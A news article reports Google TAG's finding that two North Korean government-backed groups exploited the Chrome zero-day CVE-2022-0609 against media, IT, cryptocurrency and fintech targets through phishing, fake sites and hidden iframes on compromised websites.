North Korean hackers exploited a 0Day vulnerability in Google Chrome

Criminals used the vulnerability to attack the media, IT companies, cryptocurrency and financial organizations.

North Korean hackers have exploited a zero-day vulnerability to remotely execute code in the Google Chrome browser in attacks on media, IT companies, cryptocurrencies and financial institutions.

Google’s Threat Analysis Group (TAG) team has linked two malicious campaigns exploiting the CVE-2022-0609 vulnerability to two groups backed by the North Korean government.

Cybercriminals sent out emails to potential victims, tricked them into visiting fake sites or compromised legitimate websites that eventually activated a set of exploits for CVE-2022-0609.

Google TAG discovered the campaign on February 10 of this year and fixed a vulnerability in a Google Chrome emergency update four days later. The earliest signs of exploitation of the zero-day vulnerability were discovered on January 4, 2022.

One of the two North Korean groups attacked more than 250 people working in 10 different media outlets, domain registrars, hosting providers and software providers. According to experts, this activity coincides with the North Korean cyber espionage campaign Operation Dream Job, described in detail by Clear Sky researchers in August 2020.

The second campaign targeted more than 85 users in the cryptocurrency and financial technology industries and is linked to the group behind AppleJeus’ operation. The perpetrators’ actions included compromising at least two legitimate fintech websites and posting hidden iframes to activate a set of exploits. In other cases, experts found fake sites set up to distribute Cryptocurrency Trojan applications.

The attackers integrated a number of protective features that made it more difficult to recover several stages of the exploit necessary to compromise targets. For example, an iframe with a reference to a set of exploits was served at a certain time, some targets received unique identifiers, each stage of the set was encrypted (including client responses), and the transition to the next stages of the attack depended on the success of the previous one.

Researchers have found evidence that North Korean hackers were not only interested in Google Chrome users. The criminals also checked users of the Safari and Mozilla Firefox browsers, sending them special links to servers controlled by intruders.